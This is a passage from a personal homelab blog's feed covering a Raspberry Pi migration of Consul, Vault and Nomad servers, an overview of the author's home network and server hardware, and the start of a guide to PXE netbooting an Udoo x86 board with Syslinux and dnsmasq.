<p>Finally, I imaged the new Pi with Packer and Ansible to get it ready. To my
surprise, this time around the entire playbook ran through completely without
my intervention. No fixes necessary at all. &#x1f389;</p>
<p>I made one important change to the Ansible scripting: I disabled all automatic
enabling/starting of the three tools, because I wanted to migrate them one-by-one.
And sadly the OS I use, Ubuntu Server, just autostarts services right after
installation. And as far as I read, there is no reliable way to turn that off,
because it depends on each package&rsquo;s maintainer.
Just to make sure, I masked the systemd service files for the tools:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>systemctl mask nomad.service consul.service vault.service
</span></span></code></pre></div><p>This also works when the tools/service files aren&rsquo;t even installed yet.</p>
<p>One thing to look out for: What I&rsquo;m describing here was the full migration,
done mostly on two evenings. Running any of these tools with only two servers
is strongly advised against, as you will be running the risk of &ldquo;split-brain&rdquo;
symptom. This is when there are only two instances of something, and they start
disagreeing on what reality looks like. I had Consul running for about a day
with two servers and did not see any problems, but HashiCorp strongly advises
against doing that for extended periods of time.</p>
<p>Finally, a side note: I decided to do the migration while the Homelab was still
up, but chickened out when it came to the Nomad server at the end.</p>
<h2 id="consul">Consul</h2>
<p>Consul was the first migration target because it was needed on the new host
to ensure that the two other servers were made visible via DNS.</p>
<p>The first step was changing two important configurations in the new server,
to make sure it can cleanly join the old server:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#75715e">#bootstrap_expect = 1
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>retry_join <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;oldserver.foo&#34;, &#34;newserver.foo&#34;</span>]
</span></span></code></pre></div><p>The important part is commenting out bootstrap_expect, so the new server doesn&rsquo;t
automatically elect itself as the cluster leader.</p>
<p>Then I just started the Consul server after unmasking it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>systemctl unmask consul.service
</span></span><span style="display:flex;"><span>systemctl start consul.service
</span></span></code></pre></div><p>And I was actually off to the races? This just worked out of the box. The two
servers were immediately connected. They also seemed to (voluntarily) switch
the leadership role between themselves. All data was immediately shared between
them, and I was able to point my DNS server to the new server for <code>.consul</code>
queries immediately.</p>
<p>I had to keep the old Consul server running for now, because it was also serving
as the Consul agent for registration purposes for the Vault and Nomad servers
on the old cluster controller.</p>
<p>Then, I restarted all the Consul agents on my clients, to update them
with a new <code>retry_join</code> value containing only the new Consul server. Also
worked without any problems.</p>
<p>One thing to look out for: Make sure to allow traffic to the new server from
all necessary network segments in your firewall.</p>
<p>I finally shut down the Consul server as the last service on the old cluster
controller via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>consul leave
</span></span></code></pre></div><p>For this to work, you need to have a management token set in <code>CONSUL_HTTP_TOKEN</code>.
This makes the server gracefully leave the cluster, without creating any problems
due to a missing quorum with only one of two servers remaining.</p>
<h2 id="vault">Vault</h2>
<p>This was the &ldquo;fun&rdquo; one. First of all, this data was really important to me. Then,
I had also completely misread the Vault HA documentation. <a href="https://developer.hashicorp.com/vault/docs/concepts/ha">In the docs</a>,
it is very clearly stated that HA mode needs a compatible backend. It also talks
a lot about the <a href="https://developer.hashicorp.com/vault/docs/configuration/storage/raft">Vault Integrated Storage</a>,
which uses HashiCorp&rsquo;s <code>raft</code> protocol for distributed storage of the secrets
store. And for some reason, I thought &ldquo;yeah, this is the recommended default,
I&rsquo;m pretty sure I did not stray from that when I set Vault up&rdquo;. But of course,
I had configured the simple <code>file</code> storage.</p>
<p>So now I had a problem: I did not have a HA compatible backend configured, and
I did not actually intend to start a HA setup right away - just migrate my
current single-server setup to a new host. What also frustrated me: I was not
able to figure out whether the Raft backed actually supports running in a single
server setup. I will have to dig a bit deeper on that.
Luckily, Vault already has support for migrating from one storage backend to
another, <code>vault operator migrate</code>, documented <a href="https://developer.hashicorp.com/vault/docs/commands/operator/migrate">here</a>.</p>
<p>So setting up two servers, automatically syncing them and then shutting
the old one down would not work. Instead, I just shut down the old one, copied
everything over to the new server, and started it up. This worked nicely, as far
as the data was concerned.</p>
<p>But I had overlooked one important point. I do all my Homelab controlling via
a separate machine, with a lot of my services only allowing admin actions from
that machine, as a security measure. And as mentioned previously, I switched
the vault hostname to <code>vault.service.consul</code>. But: Consul only answers DNS
queries for healthy services. And Vault reports as unhealthy as long as it is
not unsealed with <code>vault operator unseal</code>. This command decrypts the secrets
on the disk. When I tried to unseal my new Vault instance, it failed because
it was not able to access <code>vault.service.consul</code>. So on my command and control
host, I now access Vault with the new host&rsquo;s hostname, instead of the <code>.consul</code>
address.</p>
<p>All in all, a bit more turbulent than the Consul migration, but still okay.
I did this migration live, and after a couple of minutes, some of my services
became unavailable, but came back immediately once the new Vault instance was
up and running.</p>
<h2 id="nomad">Nomad</h2>
<p>Finally, &ldquo;the big one&rdquo;. For Nomad, I chickened out and decided to take down
all jobs first, just in case it went badly wrong.</p>
<p>For Nomad, I luckily did not need to update all of the Nomad client&rsquo;s config.
Nomad can use a local Consul client to discover Nomad servers. This works for
both, Nomad clients and Nomad servers.</p>
<p>The migration itself went well yet again. I only commented out <code>bootstrap_expect = 1</code>
again, to make sure the new server did not make itself the leader by default.
And yet again, the Raft state was transferred pretty quickly.</p>
<p>The problems started when I wanted to shut down the old server. This did not
work at all. When left to its own devices, the new server was just spewing failed
leader election errors:</p>
<pre tabindex="0"><code>&#34;2022-12-07T23:41:58.875+0100 [INFO]  nomad.raft: entering candidate state: node=\&#34;Node at 42.42.42:1234 [Candidate]\&#34; term=640&#34;
&#34;2022-12-07T23:41:58.879+0100 [ERROR] nomad.raft: failed to make requestVote RPC: target=\&#34;{Voter uuid-number-here 42.42.42.45:1234}\&#34; error=\&#34;dial tcp 42.42.42.45:1234: connect: connection refused\&#34;&#34;
&#34;2022-12-07T23:42:00.553+0100 [WARN]  nomad.raft: Election timeout reached, restarting election&#34;
</code></pre><p>First, I reached for <code>nomad server force-leave</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>nomad server forced-leave oldserver.global
</span></span></code></pre></div><p>This did not have any effect at all.</p>
<p>Then, I tried <code>nomad operator raft</code> to go down a layer:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>nomad operator raft remove-peer 42.42.42.45:4646
</span></span></code></pre></div><p>This also did not work, but I later realized that I might simply have used the
wrong port.</p>
<p>What finally worked was using the <a href="https://developer.hashicorp.com/nomad/docs/configuration#leave_on_interrupt">leave_on_interrupt</a>
configuration option. The <code>leave_on_terminate</code> option also did not work.
So what I ended up doing was adding <code>leave_on_interrupt</code> to the old server&rsquo;s
config and starting it again.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>leave_on_interrupt <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>And then shutting it down again immediately:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>systemctl start nomad.service
</span></span><span style="display:flex;"><span>systemctl stop nomad.service
</span></span></code></pre></div><p>Now the old server was removed correctly, and the new server, being the only
one left, elected itself as leader as expected.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>So that&rsquo;s it. The migration went far faster, and with far fewer problems than
I expected. The new cluster controller has been up for several days now, and I
do not observe any problems at all.</p>
<p>One tip: When you want to make sure that you don&rsquo;t accidentally start a service
on a machine, use <code>systemctl mask</code> on that service.</p>
<p>The Pi itself is making a good impression as a cluster controller as well, with
less than 5% CPU utilization on average and total memory consumption of about
500 MB for all three servers put together.</p>
<p>The next steps will consist of setting up the other two Pis and configuring all
three servers for HA. In addition, the three Pis will also serve as MON and MGR
daemons for my Ceph cluster.
Due to the Amazon/DHL delivery SNAFU, I will probably not be able to set up the full
HA implementation with three hosts this weekend. &#x1f622;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Current Homelab - Hardware</title>
      <link>https://blog.mei-home.net/posts/homelab-2022/hardware/</link>
      <pubDate>Thu, 27 Oct 2022 15:57:30 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-2022/hardware/</guid>
      <description>An overview over my current Homelab&amp;#39;s hardware in 2022</description>
      <content:encoded><![CDATA[<p>After finally finishing my series on netbooting Raspberry Pis, the initial
trigger for creating this blog, I want to give an overview of what my current
Homelab is looking like.</p>
<p>In this article, I will provide an overview of the hardware and hosts that I
currently have. The next one will be about the stack I&rsquo;m using, with a bit more
detail on my storage solution, Ceph, and my cluster running Nomad, Consul and
Vault.
The final article will then be an overview of the services I&rsquo;m running on the
cluster.</p>
<p>I&rsquo;m also planning a nice trip down memory lane, looking back at the past
12 years of homelabbing and describing all of the changes my setup saw, with
my reasons for the changes I made (where I can actually remember them &#x1f609;).</p>
<p>I have been running local services of some kind since about 2012. But my
renewed interest in self-hosting and my Homelab came in the autumn of 2020. I
had just switched my Internet connection from 50 MBit/s to 250 MBit/s. This also
meant a change of connection type, from ADSL to VDSL2. What I did not know at
the time: My Fritz!Box, a consumer grade DSL modem/switch/WiFi AP/DECT base station
combo unit did not actually speak VDSL2. Luckily for me, the connection still
worked, but only with 100 MBit/s peak data rate.</p>
<p>So I needed a new DSL modem. But that was the only thing I really needed. The
router, switch, WiFi AP, DECT base station were all fine and the Fritz!Box
firmware was also okay and provided a nice set of options. But I would still need
to replace the entire unit, just because the modem did not speak the new DSL
wire protocol.</p>
<p>That&rsquo;s another 200 bucks for a new Fritz!Box supporting VDSL2. Don&rsquo;t get me
wrong, I ended up investing way more into what I have now than that. It was more
the principal of &ldquo;Your DSL modem is out of date, you also have to replace your
perfectly fine WiFi AP etc&rdquo;. That annoyed me. Because that doesn&rsquo;t just mean
a new device, but also a fresh setup of said new device. It just seemed unnecessary
to me, and so I embarked on the task of getting separate physical machines for
each of these tasks. And because I wanted to monitor all of them, I introduced
a Prometheus/Grafana stack. And the rest, as they say, is history. &#x1f609;</p>
<h1 id="networking-and-infrastructure">Networking and infrastructure</h1>
<p>Let&rsquo;s start with the networking infrastructure. In short: It&rsquo;s a mess. &#x1f605;
When imagining my Homelab, do not imagine any sort of cable routing, let alone
proper cable management. I believe the only &ldquo;cable management&rdquo; I ever did was to
start buying very short network cables, for those times where a host is right
next to the switch.</p>
<p>There&rsquo;s also no rack to be found anywhere. While I&rsquo;ve got some 64 square meters
in my place, most of it is either my living room or my bedroom. And in neither
would I want to place a rack. It is far more convenient to place some small hosts
in a corner somewhere.</p>
<p><img alt="The homelab cupboard in my living room" loading="lazy" src="../homelab-cupboard.jpg"></p>
<p>This is about half of my Homelab. It&rsquo;s a couple of Raspberry Pis and an Udoo
connected to a <a href="https://www.netgear.com/de/business/wired/switches/plus/gs108e/">Netgear GS108E</a>,
1G switch. I will discuss the hosts in the next section, for now let&rsquo;s continue
with the main networking appliances:</p>
<p><img alt="My networking gear" loading="lazy" src="../networking_gear.jpg"></p>
<p>Here is the main networking part of my Homelab. It contains multiple parts
separating the firewall, VDSL modem, WiFi AP and DECT base station.</p>
<p>The center piece here is another switch, the <a href="https://www.netgear.com/de/business/wired/switches/plus/gs116ev2/">GS116E</a> with 16 1G ports.
It connects the main networking hosts as well as my main desktop machine and has
a connection to the previously mentioned 8 port switch in my Homelab cupboard.</p>
<p>Next comes the firewall machine. It is a passively cooled <a href="https://www.ipu-system.de/produkte/ipu672.html">NRG Systems IPU672</a>.
This is a passively cooled Intel i5-7200U laptop part, but it has plenty enough
power to run my firewall. It has 6 networking ports and a serial console
connection.
Initially, I wanted to run my firewall on a <a href="https://www.pcengines.ch/apu2e4.htm">PC Engines APU2E4</a>,
which comes highly praised by the router community. But I figured pretty quickly
that, while the machine was plenty quick, it was not actually quick enough.
At the time, I had just switched to a 250 MBit/s connection, and the APU2 was
not able to do full speed with traffic shaping enabled.
As far as I know, that was because the FreeBSD based <a href="https://opnsense.org/">OPNsense</a>
system has bad networking drivers that need high single core performance because
any packet stream can only ever be handled by a single core, never split over
multiple cores.
But with the new IPU672, I&rsquo;m now pretty confident that I will not have any
problems even when 1GBit fiber finally arrives in my borough.</p>
<p>As already said, the machine uses the <a href="https://opnsense.org/">OPNsense</a> firewall
distribution. The fact that it was based on FreeBSD and not Linux was pretty
interesting to me, as I did not have any previous experience with BSD. Besides
serving as my Firewall, it is also my router to the rest of the Internet. It
also hosts an <a href="https://www.nlnetlabs.nl/projects/unbound/about/">Unbound</a> DNS
server instance. This instance is fed any new DHCP address handed out and it
forwards to a <a href="https://github.com/PowerDNS/pdns">PowerDNS</a> DNS server which
is the authoritative server for all URLs which are not direct host names in
my Homelab. Furthermore, the firewall runs a DynDNS client to update my domain
when my ISP provided public IP changes.
It also hosts a WireGuard server for external connections into my Homelab.
My internal domain for hosts is <code>.home</code>, as mentioned partially in <a href="https://www.rfc-editor.org/rfc/rfc8375#ref-SUDN">RFC8375</a>.
This is also the search domain configured via DHCP for all local hosts.
The firewall also serves to create my
external connection to the rest of the world, by managing the PPPoE connection
to my provider.</p>
<p>This connection is directly tied to the next machine, a <a href="https://www.draytek.com/products/vigor165/">DrayTek Vigor 165</a>.
This is a VDSL modem/router combination machine. I&rsquo;ve currently got a 250 MBit/s
line from Deutsche Telekom, paying about 50 bucks for it. In reality, most of the
time, I&rsquo;m getting 300 MBit/s, which is pretty nice. Safe for a short stretch
in February 2020, the connection has been very stable for me.
The modem is running in bridge mode. This means that it only makes the Layer 1
connection to the line card in the DSLAM, but it does not actually connect
me to DT&rsquo;s infrastructure and gets me an external IP. That PPPoE connection is
handled by my firewall host.</p>
<p>The next piece of networking hardware is a <a href="https://www.tp-link.com/en/home-networking/wifi-router/archer-c7/">TP Link Archer C7</a>
serving as my WiFi access point. Instead of the stock firmware, I&rsquo;m using
<a href="https://openwrt.org/">OpenWRT</a>. That was pretty much the main reason for choosing
the TP Link Archer: It was fully supported by OpenWRT and wasn&rsquo;t too expensive.</p>
<p>And the final network device: A <a href="https://www.gigaset.com/de_de/gigaset-go-box-100/">Gigaset Go-Box 100</a> (Sorry, in German only).
This little box is a DECT base station for connection of wireless phones (not smartphones &#x1f609;). Landline phones
are still sometimes used in Germany, and I use it from time to time to call my
family. Plus, mobile reception isn&rsquo;t too good in my flat. This was actually
the most complicated part to figure out when I revamped my networking setup. There
are a lot of possibilities if you would like to have some combined device for
DECT telephony, with a switch and DSL router. But this one was the only thing I
was able to find which allows VoIP via ethernet cable and only does DECT, nothing
else.</p>
<h1 id="power-delivery">Power delivery</h1>
<p>Short aside on power delivery: I&rsquo;ve got a grand total of three wall sockets
available under/near my desk. And I must admit that I don&rsquo;t like that fact, as
I&rsquo;m reasonably sure that they&rsquo;re all connected to a single circuit and breaker.
I&rsquo;ve never had any problems at all with power overload, and I&rsquo;m currently in the
process of moving to lower power draw machines - but still.</p>
<p>Quite beside the &ldquo;Does the circuit actually support this?&rdquo; question, there is
also the problem of power strips. Currently, there are three power strips, one
in each of the wall sockets. But I&rsquo;ve got a lot of machines which have
their power supply as part of the plug, and not internal to the device. This
means that I&rsquo;m not able to use all available sockets on my power strips. So what
did I have to do? I chained power strips, of course. Again, due to the mostly
low power nature of my hosts, that isn&rsquo;t a problem - but it also isn&rsquo;t exactly best
practice. And with newer gaming PCs going up to &gt;1000 W in consumption, having
multiple things plugged into a 2000 W power strip might not be possible very
soon.</p>
<p>I was hoping to solve the space problem at least by buying a socket tower instead
of a strip, in the hopes that large power plugs only block a single other socket,
instead of two. That also did not really work out, but at least I&rsquo;m now having
enough sockets for all currently planned expansions.</p>
<h1 id="hosts">Hosts</h1>
<p>So besides the networking equipment, what else is there?</p>
<p>Let&rsquo;s start with the one machine which doesn&rsquo;t have anything to do with the
Homelab: My daily driver desktop. This is an AMD 3900X 12c/24t part. It&rsquo;s sitting
alongside an AMD Radeon RX580. Luckily for me, my &ldquo;Steam list of shame&rdquo; is so
long that it&rsquo;s still going to be a while until that RX580 can&rsquo;t handle the games
I want to play. &#x1f609;
The machine is running <a href="https://www.gentoo.org/">Gentoo Linux</a>. Why? Because
that was my first Linux distro back in 2007, mostly. It has never once disappointed
me in over 15 years as my main driver. Also, it is a very nice justification
for always buying the newest CPUs with the most cores. &#x1f605;</p>
<p>And here is the current centerpiece of my Homelab:</p>
<p><img alt="My main server" loading="lazy" src="../main_server.jpg"></p>
<p>This is my main server, an Intel Core i7 10700 @2.90 GHz with 8c/16t. It has
94 GB of RAM and a lot of storage:</p>
<ul>
<li>2x WD Red 4 TB, general Homelab storage in Ceph</li>
<li>2x Samsung SSD 860 Pro for the host&rsquo;s root disk</li>
<li>2x Samsung SSD 860 EVO 1TB in Ceph cluster mostly used for VM&rsquo;s/netbooted host&rsquo;s
root disks</li>
</ul>
<p>It currently runs Arch Linux. That&rsquo;s also mostly because Arch Linux has been
my server distro for years now. But it is bad at it. A server OS needs stability,
and Arch has not been able to deliver that for ages. Each update breaks either Ceph,
LXD or Qemu. Considering that that&rsquo;s the only three things running on it, that&rsquo;s
an extremely poor showing. The only reason it&rsquo;s still there is that I&rsquo;m going
to switch to a cluster of Pis soonish and don&rsquo;t want to redo everything.</p>
<p>So from my PoV: Avoid Arch Linux like the plague. The only good thing about it
is it&rsquo;s wiki.</p>
<p>As said above, the server does not run very much anymore, only LXD for virtual
machines. There are two types of VMs running on the host: One, a couple
of <a href="https://ceph.io/">Ceph</a> VMs using the two WD Red and the Samsung EVO
SSDs for a storage cluster. This is one more problem with my current setup:
Yes, I have different VMs for the different Ceph hosts - but they&rsquo;re still in
the same physical host. So when I have to reboot the machine (all the time with Arch),
I have to shut down everything. More on that later.
These Ceph VMs cannot, of course, use Ceph RBDs for their root disks, as their
task is in providing Ceph RBDs to other machines. Their root disks are in a
local LXD storage pool.
The second class of VMs are service VMs, which are running parts of my
<a href="https://www.nomadproject.io/">Nomad</a> cluster. All of these machines are getting
their root disk storage from the Ceph cluster as Ceph RBDs.</p>
<p>That&rsquo;s the problem with my setup: When this one physical host shuts down, my
storage cluster, and with it most of my hosts, VM as well as physical, are gone.
This also means that during upgrades (regular occurrence with Arch), I have to
shut down everything else. First, the physical hosts netbooting with Ceph RBD
volumes. Then the VMs booting from Ceph RBD volumes. And only then can I update
the main machine. This is why that large physical host is soon going to be
replaced by a whole cluster of Raspberry Pis, both for the Ceph cluster as well
as the Nomad cluster.</p>
<p>And this is a perfect transition to the next machine, the experimental Ceph Pi
setup.</p>
<p><img alt="My &ldquo;Can it run Ceph&rdquo; CM4" loading="lazy" src="../ceph_pi.jpg"></p>
<p>This Pi CM4 is living on a <a href="https://www.raspberrypi.com/products/compute-module-4-io-board/">CM4 IO board</a>.
In a standard ATX enclosure. With an ATX power supply and a Seagate IronWolf
4 TB HDD. In the PCIe slot of the IO board is a PCIe to SATA card. The idea
here is that, as mentioned above, I would like to switch to Pis as my Ceph cluster
hosts, but I was dubious about whether it will actually work. Thus I set up this
Frankenstein setup with a manual power switch bridging the right pins in the
ATX 24 PIN power connector, because I don&rsquo;t have a mainboard in the machine, but
I needed a power supply to connect the disks to. The CM4 8GB is running Ubuntu
server, with Ceph running baremetal. (Well, in Docker containers. More details
in the next post on software)
The verification has been pretty successful. I have not had any stability problems
whatsoever, and speed also seems to be okayish. The one downside: The PCIe bus
the CM4 makes available is only a single PCIe2 x1 lane. That means a maximum
of 500 MByte per second in throughput, which means even a single good SSD could
saturate the interface.</p>
<p>Next up: Command and Control.</p>
<p><img alt="My Command and Control server" loading="lazy" src="../candc.jpg"></p>
<p>As mentioned in the networking section, I
initially wanted to use an APU2E4 for my firewall/router, but it was too slow
with all the features I wanted. But the machine itself was still fine. It is
passively cooled, has an internal 16GB SSD and a four core processor. A slow
4 core processor, but that&rsquo;s fine. It now serves as my Command and Control server.
When doing any work on the cluster, be it on Ceph or the Nomad cluster or Consul
or Vault, I do it from this machine. The access keys for most things are stored
here, many parts of my Homelab only accept control commands from this one machine
in my network. The main reason I did it like this was to have a machine separate
from my daily driver and my travel laptop, so that I would only have to store
access keys and install all necessary tools on a single host.
One thought on future work for this machine is that it has three NICs. So if I
ever get around to introducing a segmented network with a management subnet, I
can do so.</p>
<p><img alt="My cluster master Pi" loading="lazy" src="../cluster_master.jpg"></p>
<p>This particular machine does not have anything interesting, HW wise. It&rsquo;s a
Raspberry Pi 4 4GB. It is attached to <a href="https://shop.inux3d.com/en/home/53-99-the-terrapi-q-a-quiet-terrapi.html#/10-color-red/26-ssd-single">this case from TerraPi</a>.
There&rsquo;s also a Kingston 120 GB SSD connected with a USB to SATA adapter.
The reason this machine is not netbooted is that it is supposed to be the
second &ldquo;foundational&rdquo; machine, besides my firewall host. Hence, it cannot use
any services from any other machine. It runs Ubuntu, like all other Pis, and
also provides an NFS share mounted on all hosts, for easy and quick data
sharing.
It&rsquo;s current main function is as an internal DNS server and a netboot server
with DNSmasq.</p>
<p><img alt="My Udoo X86 host" loading="lazy" src="../udoo.jpg"></p>
<p>This is my token X86 host. It is an <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo X86 II</a>
with an Intel Pentium N3710 with 2.56 GHz.
It does not have any internal storage (it has eMMC, but I&rsquo;m not using it), and
is instead using netbooting. It was interesting to set up, as in contrast to
the Raspberry Pi&rsquo;s, it does netbooting a different, more common way with
Syslinux. It is there to provide an X86 node when my cluster is entirely
migrated to ARM based Pis. Just for those few remaining cases where apps I
would like to run do not have an ARM version available.</p>
<p><img alt="My test Pi 4 node" loading="lazy" src="../pi_node.jpg"></p>
<p>This is a Raspberry Pi 4 8GB. It is configured as a cluster node in my Nomad
cluster. It doesn&rsquo;t have any local storage but is netbooted. It is there to
test whether everything works with a Raspberry Pi as a cluster node. And I&rsquo;m
pretty happy to report: Yes it does! It runs Consul and Nomad and Docker
perfectly fine. The performance is also pretty fine. For some reason, Nomad
has taken to putting my PostgreSQL job on the Pi most of the time. But I was
not seeing any problems whatsoever.
Granted, it&rsquo;s not all honey and sunshine. The Pi&rsquo;s CPU is still a relatively
low powered ARM one. So for a couple of services, I can actually tell when they
got scheduled on the Pi instead of my main server. But that&rsquo;s also fine for me.</p>
<h1 id="the-future">The Future</h1>
<p>In the future, I&rsquo;m planning to migrate away from the single large x86 server
and virtual machines over to a cluster of Pi CM4 modules. I&rsquo;ve been pretty
lucky in comparison to a lot of other members of the selfhosted community,
as I was able to gather all 8 8GB Pi CM4 modules I need to fill two
<a href="https://turingpi.com/">Turin Pi 2 cluster boards</a>. I will write about this soon.</p>
<p>And that&rsquo;s it. As I promised in the beginning, the next article will be an
overview of the software stack I&rsquo;m running, together with thoughts on
Linux distros I have been running over the years and an in-depth explanation of
my Vault/Consul/Nomad setup and the challenges of running those in a Homelab.
I might also cop to the reason I&rsquo;m not running Kubernetes. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Configuring an Udoo x86 II Ultra for Netbooting</title>
      <link>https://blog.mei-home.net/posts/udoo/</link>
      <pubDate>Thu, 29 Sep 2022 20:01:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/udoo/</guid>
      <description>Setup of an Udoo X86 II Ultra for PXE boot</description>
      <content:encoded><![CDATA[<p><img alt="A running Udoo X86 II Ultra" loading="lazy" src="/posts/udoo/images/udoo_deployed.JPG"></p>
<p>I&rsquo;m currently planning to switch my Homelab to a cluster of eight Raspberry Pi
CM4 modules with two <a href="https://www.kickstarter.com/projects/turingpi/turing-pi-cluster-board">Turing Pi 2 boards</a>.
That means a full switch to the aarch64/ARM processor architecture. But not all
software supports aarch64 yet. So I went looking for a small x86 machine which
doesn&rsquo;t cost too much, doesn&rsquo;t take too much space, and doesn&rsquo;t consume too much
power.</p>
<p>What I found was the <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo x86 II Ultra</a>.
Here are the base specs:</p>
<ul>
<li><em>CPU</em>: Intel Pentium N3710 2.56 GHz</li>
<li><em>RAM</em>: 8 GB DDR3 Dual Channel</li>
<li><em>Storage</em>: 32 GB eMMC</li>
</ul>
<p>The power is more than enough, as I don&rsquo;t expect to end up with too many x86 only
services (right now I&rsquo;m running over 20 jobs in my cluster, and none of them
is x86 only).</p>
<p>With an enclosure and a power brick, it cost me a total of 450 €. Could I have
build a cheaper machine from standard components? Possibly. But it would not
have been this small (13 cm x 9 cm x 3cm) and would have probably drawn at least
a bit more power. With how little it uses, it is also running perfectly when
passively cooled.</p>
<p>Here is a Grafana plot showing the CPU utilization and CPU frequency during
a <code>stress-ng -c 4</code> run. The small heat sink in the picture above was able to
sustain the full 2.56 GHz on all four cores for about 5 minutes before throttling
started.</p>
<p><img alt="Grafana plot showing CPU throttling starting around five minutes into a stress\nrun" loading="lazy" src="/posts/udoo/images/sobek_grafana_stress.png"></p>
<p>The storage does not play much of a role for me, as I planned to netboot it
anyway. This machine&rsquo;s only task is to serve as an x86 machine in my Nomad
cluster for those few services I would like to run which only support x86.</p>
<p>In the rest of this post, I will go a little bit into details on the netboot
and image creation for this machine. I only just finished <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">a series on netbooting
Raspberry Pis</a>, but this was a different
experience for two reasons: One, the Udoo supports full standard PXE boot, while
the Pi does a little bit of its own thing. Two, I had to redo my image setup,
because I used the <em>packer-builder-arm</em> Packer plugin for my Pi images.
For this new image, I now used the QEMU builder, which has an amusing (to me &#x1f609;)
way of running an OS installer (Ubuntu again).</p>
<h1 id="pxe-boot">PXE boot</h1>
<p>There is one major difference between the Pi netboot approach I have described
in a <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#how-the-raspberry-pi-netboot-works">previous article</a>
and the standard PXE boot process.</p>
<p>Every PXE network boot process needs a Network Bootstrap Program. This program
serves as the bootloader for the system under netboot, similar to <em>grub</em> in
local boots. Grub itself can even be used as a Network Bootstrap Program. On
Raspberry Pis, that program is already present on the Pi itself, because Pis do
not follow a standard boot process and don&rsquo;t have BIOS or UEFI.</p>
<p>So with the Udoo, we need one additional step: Downloading the Network Bootstrap
Program. Once that Network Bootstrap Program is downloaded though, the boot
process for Raspberry Pis and the Udoo look exactly the same.</p>
<p>The NBP can be a variety of different programs. In my setup, I am using
<a href="https://wiki.syslinux.org">Syslinux</a>. Syslinux is part of a tandem of programs,
with the other one being PXELinux. They share similar configurations and behavior,
and the main difference is that Syslinux is for use with UEFI systems, while
PXELinux is for use with BIOS systems.</p>
<p>To begin with, the network stack and netbooting needs to be enabled in the Udoo&rsquo;s
BIOS.</p>
<h2 id="preparing-the-netboot-server">Preparing the netboot server</h2>
<p>In addition, <code>syslinux</code> needs to be installed on the server providing TFTP. Once
it is installed, you need the following files in a directory where your TFTP
server can access them:</p>
<ul>
<li><code>syslinux.efi</code></li>
<li><code>ldlinux.e64</code></li>
</ul>
<p>Where exactly those files are found depends on the distribution/package. On
Ubuntu, they are found at <code>/usr/lib/syslinux/modules/efi64/ldlinux.e64</code> for the
<code>ldlinux.e64</code> and at <code>/usr/lib/SYSLINUX.EFI/efi64/syslinux.efi</code> for the <code>syslinux.efi</code>.
For my configuration, I just put those files into the root of my <code>/mnt/netboot</code>
NFS share.</p>
<p>The netboot process, similar to Raspberry Pis, begins with a DHCP request. So
the first step is configuring the DHCP server for netbooting. This is described
in detail in my <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#dnsmasq-and-tftp">Pi netboot server article</a>
and I will only describe the additions here.</p>
<p>The DNSmasq config from the Pi netboot article only needs to be extended by a
single line, but I will only show the file with the Syslinux options here:</p>
<pre tabindex="0"><code>port=0
dhcp-range=10.86.5.255,proxy
log-dhcp
enable-tftp
tftp-root=/mnt/netboot
pxe-service=X86-64_EFI,&#34;EFI Netboot&#34;,syslinux.efi
</code></pre><p>The <code>pxe-service</code> option has, as its first parameter, the client architecture.
In this case, <code>X86-64_EFI</code>, because the Udoo is a x86 machine with UEFI.</p>
<p>The third parameter provides the NBP file which will be offered to all clients
which contact this DHCP server with the <code>X86-64_EFI</code> client architecture.
The filepath is relative to the <code>tftp-root</code> directory.</p>
<p>Now we are ready to prepare the configuration file. Basically the only thing
the PXE protocol says is how to get this NBP file via DHCP and TFTP. Everything
else is up to the NBP itself.</p>
<p>How Syslinux works is described in the <a href="https://wiki.syslinux.org/wiki/index.php?title=PXELINUX">official wiki</a>.
Don&rsquo;t worry about PXELinux here, both programs do almost the same things.</p>
<p>In principle, it works similar to the Raspberry Pi netboot, with one difference:
Instead of looking for predetermined files in predetermined directories for
kernel, initrd and kernel command line, it only looks for a configuration file
in multiple different places and takes all options from that.</p>
<p>When looking for a config file, Syslinux will be looking in the following places:</p>
<ul>
<li><code>/mnt/netboot/pxelinux.cfg/&lt;Client machine id&gt;</code></li>
<li><code>/mnt/netboot/pxelinux.cfg/&lt;HWTYPE&gt;-&lt;HW ADDRESS&gt;</code></li>
<li><code>/mnt/netboot/pxelinux.cfg/&lt;IPv4 in HEX&gt;</code></li>
<li><code>default</code></li>
</ul>
